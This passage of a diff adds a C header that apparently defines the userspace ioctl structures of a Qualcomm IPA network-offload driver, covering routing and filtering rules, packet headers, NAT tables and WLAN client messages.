+ * @IPA_HW_v2_5: IPA hardware version 2.5
+ * @IPA_HW_v2_6: IPA hardware version 2.6
+ * @IPA_HW_v2_6L: IPA hardware version 2.6L
+ * @IPA_HW_v3_0: IPA hardware version 3.0
+ */
+enum ipa_hw_type {
+ IPA_HW_None = 0,
+ IPA_HW_v1_0 = 1,
+ IPA_HW_v1_1 = 2,
+ IPA_HW_v2_0 = 3,
+ IPA_HW_v2_1 = 4,
+ IPA_HW_v2_5 = 5,
+ IPA_HW_v2_6 = IPA_HW_v2_5,
+ IPA_HW_v2_6L = 6,
+ IPA_HW_v3_0 = 10,
+ IPA_HW_v3_1 = 11,
+ IPA_HW_MAX
+};
+
+/**
+ * struct ipa_rule_attrib - attributes of a routing/filtering
+ * rule, all in LE
+ * @attrib_mask: what attributes are valid
+ * @src_port_lo: low port of src port range
+ * @src_port_hi: high port of src port range
+ * @dst_port_lo: low port of dst port range
+ * @dst_port_hi: high port of dst port range
+ * @type: ICMP/IGMP type
+ * @code: ICMP/IGMP code
+ * @spi: IPSec SPI
+ * @src_port: exact src port
+ * @dst_port: exact dst port
+ * @meta_data: meta-data val
+ * @meta_data_mask: meta-data mask
+ * @u.v4.tos: type of service
+ * @u.v4.protocol: protocol
+ * @u.v4.src_addr: src address value
+ * @u.v4.src_addr_mask: src address mask
+ * @u.v4.dst_addr: dst address value
+ * @u.v4.dst_addr_mask: dst address mask
+ * @u.v6.tc: traffic class
+ * @u.v6.flow_label: flow label
+ * @u.v6.next_hdr: next header
+ * @u.v6.src_addr: src address val
+ * @u.v6.src_addr_mask: src address mask
+ * @u.v6.dst_addr: dst address val
+ * @u.v6.dst_addr_mask: dst address mask
+ */
+struct ipa_rule_attrib {
+ uint32_t attrib_mask;
+ uint16_t src_port_lo;
+ uint16_t src_port_hi;
+ uint16_t dst_port_lo;
+ uint16_t dst_port_hi;
+ uint8_t type;
+ uint8_t code;
+ uint8_t tos_value;
+ uint8_t tos_mask;
+ uint32_t spi;
+ uint16_t src_port;
+ uint16_t dst_port;
+ uint32_t meta_data;
+ uint32_t meta_data_mask;
+ uint8_t src_mac_addr[ETH_ALEN];
+ uint8_t src_mac_addr_mask[ETH_ALEN];
+ uint8_t dst_mac_addr[ETH_ALEN];
+ uint8_t dst_mac_addr_mask[ETH_ALEN];
+ uint16_t ether_type;
+ union {
+ struct {
+ uint8_t tos;
+ uint8_t protocol;
+ uint32_t src_addr;
+ uint32_t src_addr_mask;
+ uint32_t dst_addr;
+ uint32_t dst_addr_mask;
+ } v4;
+ struct {
+ uint8_t tc;
+ uint32_t flow_label;
+ uint8_t next_hdr;
+ uint32_t src_addr[4];
+ uint32_t src_addr_mask[4];
+ uint32_t dst_addr[4];
+ uint32_t dst_addr_mask[4];
+ } v6;
+ } u;
+};
+
+/*! @brief The maximum number of Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of IHL offset Mask Equal 32 Eqns */
+#define IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS 2
+
+/*! @brief The maximum number of Mask Equal 128 Eqns */
+#define IPA_IPFLTR_NUM_MEQ_128_EQNS 2
+
+/*! @brief The maximum number of IHL offset Range Check 16 Eqns */
+#define IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS 2
+
+/*! @brief Offset and 16 bit comparison equation */
+struct ipa_ipfltr_eq_16 {
+ int8_t offset;
+ uint16_t value;
+};
+
+/*! @brief Offset and 32 bit comparison equation */
+struct ipa_ipfltr_eq_32 {
+ int8_t offset;
+ uint32_t value;
+};
+
+/*! @brief Offset and 128 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_128 {
+ int8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+/*! @brief Offset and 32 bit masked comparison equation */
+struct ipa_ipfltr_mask_eq_32 {
+ int8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+/*! @brief Equation for identifying a range. Ranges are inclusive */
+struct ipa_ipfltr_range_eq_16 {
+ int8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+/*! @brief Rule equations which are set according to DS filter installation */
+struct ipa_ipfltri_rule_eq {
+ /*! 16-bit Bitmask to indicate how many eqs are valid in this rule */
+ uint16_t rule_eq_bitmap;
+ /*! Specifies if a type of service check rule is present */
+ uint8_t tos_eq_present;
+ /*! The value to check against the type of service (ipv4) field */
+ uint8_t tos_eq;
+ /*! Specifies if a protocol check rule is present */
+ uint8_t protocol_eq_present;
+ /*! The value to check against the protocol (ipv6) field */
+ uint8_t protocol_eq;
+ /*! The number of ip header length offset 16 bit range check
+ * rules in this rule */
+ uint8_t num_ihl_offset_range_16;
+ /*! An array of the registered ip header length offset 16 bit
+ * range check rules */
+ struct ipa_ipfltr_range_eq_16
+ ihl_offset_range_16[IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS];
+ /*! The number of mask equal 32 rules present in this rule */
+ uint8_t num_offset_meq_32;
+ /*! An array of all the possible mask equal 32 rules in this rule */
+ struct ipa_ipfltr_mask_eq_32
+ offset_meq_32[IPA_IPFLTR_NUM_MEQ_32_EQNS];
+ /*! Specifies if the traffic class rule is present in this rule */
+ uint8_t tc_eq_present;
+ /*! The value to check the traffic class (ipv4) field against */
+ uint8_t tc_eq;
+ /*! Specifies if the flow equals rule is present in this rule */
+ uint8_t fl_eq_present;
+ /*! The value to check the flow (ipv6) field against */
+ uint32_t fl_eq;
+ /*! The number of ip header length offset 16 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_16_present;
+ /*! The ip header length offset 16 bit equation */
+ struct ipa_ipfltr_eq_16 ihl_offset_eq_16;
+ /*! The number of ip header length offset 32 bit equations in this
+ * rule */
+ uint8_t ihl_offset_eq_32_present;
+ /*! The ip header length offset 32 bit equation */
+ struct ipa_ipfltr_eq_32 ihl_offset_eq_32;
+ /*! The number of ip header length offset 32 bit mask equations in
+ * this rule */
+ uint8_t num_ihl_offset_meq_32;
+ /*! The ip header length offset 32 bit mask equation */
+ struct ipa_ipfltr_mask_eq_32
+ ihl_offset_meq_32[IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS];
+ /*! The number of ip header length offset 128 bit equations in this
+ * rule */
+ uint8_t num_offset_meq_128;
+ /*! The ip header length offset 128 bit equation */
+ struct ipa_ipfltr_mask_eq_128
+ offset_meq_128[IPA_IPFLTR_NUM_MEQ_128_EQNS];
+ /*! The metadata 32 bit masked comparison equation present or not */
+ /* Metadata based rules are added internally by IPA driver */
+ uint8_t metadata_meq32_present;
+ /*! The metadata 32 bit masked comparison equation */
+ struct ipa_ipfltr_mask_eq_32 metadata_meq32;
+ /*! Specifies if the Fragment equation is present in this rule */
+ uint8_t ipv4_frag_eq_present;
+};
+
+/**
+ * struct ipa_flt_rule - attributes of a filtering rule
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ * @to_uc: bool switch to pass packet to micro-controller
+ * @action: action field
+ * @rt_tbl_hdl: handle of table from "get"
+ * @attrib: attributes of the rule
+ * @eq_attrib: attributes of the rule in equation form (valid when
+ * eq_attrib_type is true)
+ * @rt_tbl_idx: index of RT table referred to by filter rule (valid when
+ * eq_attrib_type is true and non-exception action)
+ * @eq_attrib_type: true if equation level form used to specify attributes
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @rule_id: rule_id to be assigned to the filter rule. In case client specifies
+ * rule_id as 0 the driver will assign a new rule_id
+ */
+struct ipa_flt_rule {
+ uint8_t retain_hdr;
+ uint8_t to_uc;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_hdl;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ uint32_t rt_tbl_idx;
+ uint8_t eq_attrib_type;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint16_t rule_id;
+};
+
+/**
+ * enum ipa_hdr_l2_type - L2 header type
+ * IPA_HDR_L2_NONE: L2 header which isn't Ethernet II and isn't 802_3
+ * IPA_HDR_L2_ETHERNET_II: L2 header of type Ethernet II
+ * IPA_HDR_L2_802_3: L2 header of type 802_3
+ */
+enum ipa_hdr_l2_type {
+ IPA_HDR_L2_NONE,
+ IPA_HDR_L2_ETHERNET_II,
+ IPA_HDR_L2_802_3,
+ IPA_HDR_L2_MAX,
+};
+
+/**
+ * enum ipa_hdr_l2_type - Processing context type
+ * IPA_HDR_PROC_NONE: No processing context
+ * IPA_HDR_PROC_ETHII_TO_ETHII: Process Ethernet II to Ethernet II
+ * IPA_HDR_PROC_ETHII_TO_802_3: Process Ethernet II to 802_3
+ * IPA_HDR_PROC_802_3_TO_ETHII: Process 802_3 to Ethernet II
+ * IPA_HDR_PROC_802_3_TO_802_3: Process 802_3 to 802_3
+ */
+enum ipa_hdr_proc_type {
+ IPA_HDR_PROC_NONE,
+ IPA_HDR_PROC_ETHII_TO_ETHII,
+ IPA_HDR_PROC_ETHII_TO_802_3,
+ IPA_HDR_PROC_802_3_TO_ETHII,
+ IPA_HDR_PROC_802_3_TO_802_3,
+ IPA_HDR_PROC_MAX,
+};
+
+/**
+ * struct ipa_rt_rule - attributes of a routing rule
+ * @dst: dst "client"
+ * @hdr_hdl: handle to the dynamic header
+ it is not an index or an offset
+ * @hdr_proc_ctx_hdl: handle to header processing context. if it is provided
+ hdr_hdl shall be 0
+ * @attrib: attributes of the rule
+ * @max_prio: bool switch. is this rule with Max priority? meaning on rule hit,
+ * IPA will use the rule and will not look for other rules that may have
+ * higher priority
+ * @hashable: bool switch. is this rule hashable or not?
+ * ipa uses hashable rules to cache their hit results to be used in
+ * consecutive packets
+ * @retain_hdr: bool switch to instruct IPA core to add back to the packet
+ * the header removed as part of header removal
+ */
+struct ipa_rt_rule {
+ enum ipa_client_type dst;
+ uint32_t hdr_hdl;
+ uint32_t hdr_proc_ctx_hdl;
+ struct ipa_rule_attrib attrib;
+ uint8_t max_prio;
+ uint8_t hashable;
+ uint8_t retain_hdr;
+};
+
+/**
+ * struct ipa_hdr_add - header descriptor includes in and out
+ * parameters
+ * @name: name of the header
+ * @hdr: actual header to be inserted
+ * @hdr_len: size of above header
+ * @type: l2 header type
+ * @is_partial: header not fully specified
+ * @hdr_hdl: out parameter, handle to header, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_hdr_add {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint32_t hdr_hdl;
+ int status;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - header addition parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be written to IPA HW also?
+ * @num_hdrs: num of headers that follow
+ * @ipa_hdr_add hdr: all headers need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr {
+ uint8_t commit;
+ uint8_t num_hdrs;
+ struct ipa_hdr_add hdr[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_add - processing context descriptor includes
+ * in and out parameters
+ * @type: processing context type
+ * @hdr_hdl: in parameter, handle to header
+ * @proc_ctx_hdl: out parameter, handle to proc_ctx, valid when status is 0
+ * @status: out parameter, status of header add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_add {
+ enum ipa_hdr_proc_type type;
+ uint32_t hdr_hdl;
+ uint32_t proc_ctx_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_hdr - processing context addition parameters (support
+ * multiple processing context and commit)
+ * @commit: should processing context be written to IPA HW also?
+ * @num_proc_ctxs: num of processing context that follow
+ * @proc_ctx: all processing context need to go here back to
+ * back, no pointers
+ */
+struct ipa_ioc_add_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_proc_ctxs;
+ struct ipa_hdr_proc_ctx_add proc_ctx[0];
+};
+
+/**
+ * struct ipa_ioc_copy_hdr - retrieve a copy of the specified
+ * header - caller can then derive the complete header
+ * @name: name of the header resource
+ * @hdr: out parameter, contents of specified header,
+ * valid only when ioctl return val is non-negative
+ * @hdr_len: out parameter, size of above header
+ * valid only when ioctl return val is non-negative
+ * @type: l2 header type
+ * valid only when ioctl return val is non-negative
+ * @is_partial: out parameter, indicates whether specified header is partial
+ * valid only when ioctl return val is non-negative
+ * @is_eth2_ofst_valid: is eth2_ofst field valid?
+ * @eth2_ofst: offset to start of Ethernet-II/802.3 header
+ */
+struct ipa_ioc_copy_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t hdr[IPA_HDR_MAX_SIZE];
+ uint8_t hdr_len;
+ enum ipa_hdr_l2_type type;
+ uint8_t is_partial;
+ uint8_t is_eth2_ofst_valid;
+ uint16_t eth2_ofst;
+};
+
+/**
+ * struct ipa_ioc_get_hdr - header entry lookup parameters, if lookup was
+ * successful caller must call put to release the reference count when done
+ * @name: name of the header resource
+ * @hdl: out parameter, handle of header entry
+ * valid only when ioctl return val is non-negative
+ */
+struct ipa_ioc_get_hdr {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_hdr_del - header descriptor includes in and out
+ * parameters
+ *
+ * @hdl: handle returned from header add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_hdr - header deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should headers be removed from IPA HW also?
+ * @num_hdls: num of headers being removed
+ * @ipa_hdr_del hdl: all handles need to go here back to back, no pointers
+ */
+struct ipa_ioc_del_hdr {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_del hdl[0];
+};
+
+/**
+ * struct ipa_hdr_proc_ctx_del - processing context descriptor includes
+ * in and out parameters
+ * @hdl: handle returned from processing context add operation
+ * @status: out parameter, status of header remove operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_hdr_proc_ctx_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * ipa_ioc_del_hdr_proc_ctx - processing context deletion parameters (support
+ * multiple headers and commit)
+ * @commit: should processing contexts be removed from IPA HW also?
+ * @num_hdls: num of processing contexts being removed
+ * @ipa_hdr_proc_ctx_del hdl: all handles need to go here back to back,
+ * no pointers
+ */
+struct ipa_ioc_del_hdr_proc_ctx {
+ uint8_t commit;
+ uint8_t num_hdls;
+ struct ipa_hdr_proc_ctx_del hdl[0];
+};
+
+/**
+ * struct ipa_rt_rule_add - routing rule descriptor includes in
+ * and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of routing table, it is NOT possible to add rules at
+ * the rear of the "default" routing tables
+ * @rt_rule_hdl: output parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of routing rule add operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_add {
+ struct ipa_rt_rule rule;
+ uint8_t at_rear;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule - routing rule addition parameters (supports
+ * multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_rt_rule_after - routing rule addition after a specific
+ * rule parameters(supports multiple rules and commit);
+ *
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @rt_tbl_name: name of routing table resource
+ * @num_rules: number of routing rules that follow
+ * @add_after_hdl: the rules will be added after this specific rule
+ * @ipa_rt_rule_add rules: all rules need to go back to back here, no pointers
+ * at_rear field will be ignored when using this IOCTL
+ */
+struct ipa_ioc_add_rt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ char rt_tbl_name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_rt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_mdfy - routing rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @rt_rule_hdl: handle to rule which supposed to modify
+ * @status: output parameter, status of routing rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_rt_rule_mdfy {
+ struct ipa_rt_rule rule;
+ uint32_t rt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_rt_rule - routing rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of routing rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_rt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_rt_rule_del - routing rule descriptor includes in
+ * and out parameters
+ * @hdl: handle returned from route rule add operation
+ * @status: output parameter, status of route rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_rt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_rt_rule - routing rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @ipa_rt_rule_del hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_rt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_rt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl_indx - routing table index lookup parameters
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @index: output parameter, routing table index, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl_indx {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t idx;
+};
+
+/**
+ * struct ipa_flt_rule_add - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of filtering table?
+ * @flt_rule_hdl: out parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of filtering rule add operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_add {
+ struct ipa_flt_rule rule;
+ uint8_t at_rear;
+ uint32_t flt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule - filtering rule addition parameters (supports
+ * multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * valid only when global is 0
+ * @global: does this apply to global filter table of specific IP family
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t global;
+ uint8_t num_rules;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule_after - filtering rule addition after specific
+ * rule parameters (supports multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * @num_rules: number of filtering rules that follow
+ * @add_after_hdl: rules will be added after the rule with this handle
+ * @rules: all rules need to go back to back here, no pointers. at rear field
+ * is ignored when using this IOCTL
+ */
+struct ipa_ioc_add_flt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_mdfy - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @flt_rule_hdl: handle to rule
+ * @status: output parameter, status of filtering rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_mdfy {
+ struct ipa_flt_rule rule;
+ uint32_t rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_flt_rule - filtering rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_flt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_del - filtering rule descriptor includes
+ * in and out parameters
+ *
+ * @hdl: handle returned from filtering rule add operation
+ * @status: output parameter, status of filtering rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_flt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_flt_rule - filtering rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_flt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl - routing table lookup parameters, if lookup was
+ * successful caller must call put to release the reference
+ * count when done
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @htl: output parameter, handle of routing table, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_ioc_query_intf - used to lookup number of tx and
+ * rx properties of interface
+ * @name: name of interface
+ * @num_tx_props: output parameter, number of tx properties
+ * valid only when ioctl return val is non-negative
+ * @num_rx_props: output parameter, number of rx properties
+ * valid only when ioctl return val is non-negative
+ * @num_ext_props: output parameter, number of ext properties
+ * valid only when ioctl return val is non-negative
+ * @excp_pipe: exception packets of this interface should be
+ * routed to this pipe
+ */
+struct ipa_ioc_query_intf {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ uint32_t num_rx_props;
+ uint32_t num_ext_props;
+ enum ipa_client_type excp_pipe;
+};
+
+/**
+ * struct ipa_ioc_tx_intf_prop - interface tx property
+ * @ip: IP family of routing rule
+ * @attrib: routing rule
+ * @dst_pipe: routing output pipe
+ * @alt_dst_pipe: alternate routing output pipe
+ * @hdr_name: name of associated header if any, empty string when no header
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_tx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type dst_pipe;
+ enum ipa_client_type alt_dst_pipe;
+ char hdr_name[IPA_RESOURCE_NAME_MAX];
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_tx_props - interface tx propertie
+ * @name: name of interface
+ * @num_tx_props: number of TX properties
+ * @tx[0]: output parameter, the tx properties go here back to back
+ */
+struct ipa_ioc_query_intf_tx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[0];
+};
+
+/**
+ * struct ipa_ioc_ext_intf_prop - interface extended property
+ * @ip: IP family of routing rule
+ * @eq_attrib: attributes of the rule in equation form
+ * @action: action field
+ * @rt_tbl_idx: index of RT table referred to by filter rule
+ * @mux_id: MUX_ID
+ * @filter_hdl: handle of filter (as specified by provider of filter rule)
+ * @is_xlat_rule: it is xlat flt rule or not
+ */
+struct ipa_ioc_ext_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_idx;
+ uint8_t mux_id;
+ uint32_t filter_hdl;
+ uint8_t is_xlat_rule;
+ uint32_t rule_id;
+ uint8_t is_rule_hashable;
+};
+
+/**
+ * struct ipa_ioc_query_intf_ext_props - interface ext propertie
+ * @name: name of interface
+ * @num_ext_props: number of EXT properties
+ * @ext[0]: output parameter, the ext properties go here back to back
+ */
+struct ipa_ioc_query_intf_ext_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[0];
+};
+
+/**
+ * struct ipa_ioc_rx_intf_prop - interface rx property
+ * @ip: IP family of filtering rule
+ * @attrib: filtering rule
+ * @src_pipe: input pipe
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_rx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type src_pipe;
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_rx_props - interface rx propertie
+ * @name: name of interface
+ * @num_rx_props: number of RX properties
+ * @rx: output parameter, the rx properties go here back to back
+ */
+struct ipa_ioc_query_intf_rx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[0];
+};
+
+/**
+ * struct ipa_ioc_nat_alloc_mem - nat table memory allocation
+ * properties
+ * @dev_name: input parameter, the name of table
+ * @size: input parameter, size of table in bytes
+ * @offset: output parameter, offset into page in case of system memory
+ */
+struct ipa_ioc_nat_alloc_mem {
+ char dev_name[IPA_RESOURCE_NAME_MAX];
+ size_t size;
+ off_t offset;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_init - nat table initialization
+ * parameters
+ * @tbl_index: input parameter, index of the table
+ * @ipv4_rules_offset: input parameter, ipv4 rules address offset
+ * @expn_rules_offset: input parameter, ipv4 expansion rules address offset
+ * @index_offset: input parameter, index rules offset
+ * @index_expn_offset: input parameter, index expansion rules offset
+ * @table_entries: input parameter, ipv4 rules table size in entries
+ * @expn_table_entries: input parameter, ipv4 expansion rules table size
+ * @ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_init {
+ uint8_t tbl_index;
+ uint32_t ipv4_rules_offset;
+ uint32_t expn_rules_offset;
+
+ uint32_t index_offset;
+ uint32_t index_expn_offset;
+
+ uint16_t table_entries;
+ uint16_t expn_table_entries;
+ uint32_t ip_addr;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_del - nat table delete parameter
+ * @table_index: input parameter, index of the table
+ * @public_ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_del {
+ uint8_t table_index;
+ uint32_t public_ip_addr;
+};
+
+/**
+ * struct ipa_ioc_nat_dma_one - nat dma command parameter
+ * @table_index: input parameter, index of the table
+ * @base_addr: type of table, from which the base address of the table
+ * can be inferred
+ * @offset: destination offset within the NAT table
+ * @data: data to be written.
+ */
+struct ipa_ioc_nat_dma_one {
+ uint8_t table_index;
+ uint8_t base_addr;
+
+ uint32_t offset;
+ uint16_t data;
+
+};
+
+/**
+ * struct ipa_ioc_nat_dma_cmd - To hold multiple nat dma commands
+ * @entries: number of dma commands in use
+ * @dma: data pointer to the dma commands
+ */
+struct ipa_ioc_nat_dma_cmd {
+ uint8_t entries;
+ struct ipa_ioc_nat_dma_one dma[0];
+
+};
+
+/**
+ * struct ipa_msg_meta - Format of the message meta-data.
+ * @msg_type: the type of the message
+ * @rsvd: reserved bits for future use.
+ * @msg_len: the length of the message in bytes
+ *
+ * For push model:
+ * Client in user-space should issue a read on the device (/dev/ipa) with a
+ * sufficiently large buffer in a continuous loop, call will block when there is
+ * no message to read. Upon return, client can read the ipa_msg_meta from start
+ * of buffer to find out type and length of message
+ * size of buffer supplied >= (size of largest message + size of metadata)
+ *
+ * For pull model:
+ * Client in user-space can also issue a pull msg IOCTL to device (/dev/ipa)
+ * with a payload containing space for the ipa_msg_meta and the message specific
+ * payload length.
+ * size of buffer supplied == (len of specific message + size of metadata)
+ */
+struct ipa_msg_meta {
+ uint8_t msg_type;
+ uint8_t rsvd;
+ uint16_t msg_len;
+};
+
+/**
+ * struct ipa_wlan_msg - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @mac_addr: mac address of wlan client
+ *
+ * wlan drivers need to pass name of wlan iface and mac address of
+ * wlan client along with ipa_wlan_event, whenever a wlan client is
+ * connected/disconnected/moved to power save/come out of power save
+ */
+struct ipa_wlan_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+};
+
+/**
+ * enum ipa_wlan_hdr_attrib_type - attribute type
+ * in wlan client header
+ *
+ * WLAN_HDR_ATTRIB_MAC_ADDR: attrib type mac address
+ * WLAN_HDR_ATTRIB_STA_ID: attrib type station id
+ */
+enum ipa_wlan_hdr_attrib_type {
